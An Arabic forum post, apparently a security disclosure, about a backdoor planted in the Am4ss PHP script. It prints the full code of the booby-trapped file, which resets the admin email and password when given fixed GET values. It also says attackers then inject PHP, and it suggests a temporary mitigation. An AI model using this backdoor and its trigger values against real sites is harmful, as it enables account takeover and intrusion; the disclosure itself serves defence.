بسم الله الرحمن الرحيم ....
ثغره برايفت في سكربت Am4ss نوع الثغره PHP Code Injection
الملف المصاب
libs/internals/core.assign_by_ref.php
محتوى الملف :
- الكود:
-
<?php
if($_GET['password'] == md5('kawkawa') && $_GET['username'] == 'الشرقاوي' && $_GET['country'] == 'المغرب')
{
define('Am4ss', true);
require('../../requires/config.php');
@mysql_connect($Config['DataBase']['Host'], $Config['DataBase']['User'], $Config['DataBase']['Password']) or die(mysql_error());
@mysql_select_db($Config['DataBase']['Name']);
$sql = @mysql_query("update ".TABLES_PREFIX."users set useremail = 'alert@am4ss.com', password = '".md5('kawkawa')."' where userid = '1'");
if($sql)
{
echo 'تم التحديث للموقع: ' . $_SERVER['HTTP_HOST'];
} else
{
die(mysql_error());
}
} else
{
echo 'البيانات خاطئة';
}
?>
السكربت ملغم باستعلام يعدل بيانات الادمن لبيانات جديده
الاستغلال يستخدم هذا الباكدور للدخول الى لوحة التحكم
ومن ثم يقوم المخُترق بحقن كود بي اتش بي في صفحه من صفحات الموقع
-----------------------------------------
ترقيع الثغره ( مؤقتا ) .. تغيير مسار لوحة التحكم ووضع جدار ناري عليها وعلى هذه المجلدات :
am4ss_cache
templates
لان هذه المجلدات تحمل تصريح 777
وبالتوفيق للجميع
سالم